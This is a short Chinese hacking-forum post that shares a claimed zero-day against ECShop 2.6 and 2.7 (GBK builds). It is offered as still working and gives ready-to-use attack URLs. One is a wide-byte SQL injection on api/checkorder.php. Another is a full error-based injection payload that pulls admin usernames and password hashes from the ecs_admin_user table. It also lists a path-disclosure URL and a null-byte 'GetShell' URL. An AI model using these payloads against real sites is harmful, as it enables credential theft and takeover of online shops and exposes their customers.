据说该0day是fjhgx(俺是农村的)大牛发现的。。。

Exp等黑小子发吧。。。或者自己手动也行。。。

以前很早的东西了   刚测试还可以用 至于有一些能不能搞 自行测试   这些东西都可以想起以前的兄弟们 我对这些已经不敢兴趣了 有什么好东西我会陆续放出 工具我会打包!



ecshop 通杀2.6*2.7 GBK版本 附上测试图!
大小: 191.17 K尺寸: 500 x 354浏览: 12 次点击打开新窗口浏览全图大小: 135.02 K尺寸: 500 x 378浏览: 15 次点击打开新窗口浏览全图大小: 109.57 K尺寸: 500 x 340浏览: 11 次点击打开新窗口浏览全图大小: 29.68 K尺寸: 457 x 254浏览: 11 次点击打开新窗口浏览全图大小: 126.66 K尺寸: 500 x 389浏览: 12 次点击打开新窗口浏览全图

(射出编码 0x全部替换)


(替换后的编码)



(lcx的php注射工具 转换编码 From Hex 转换后得到MD5)

大小: 126.66 K尺寸: 500 x 389浏览: 11 次点击打开新窗口浏览全图

ecshop GetShell
http://localhost/ECShop/demo/index.php?a=1111111111%00
爆路径
http://localhost/ECShop/includes\fckeditor\editor\dialog\fck_spellerpages\spellerpages\server-scripts/spellchecker.php

测试
http://localhost/api/checkorder.php?username=%CE%27 or 1=1 %23

 

=============

http://localhost/ecshop/api/checkorder.php?username=%ce%27%20and%201=2%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23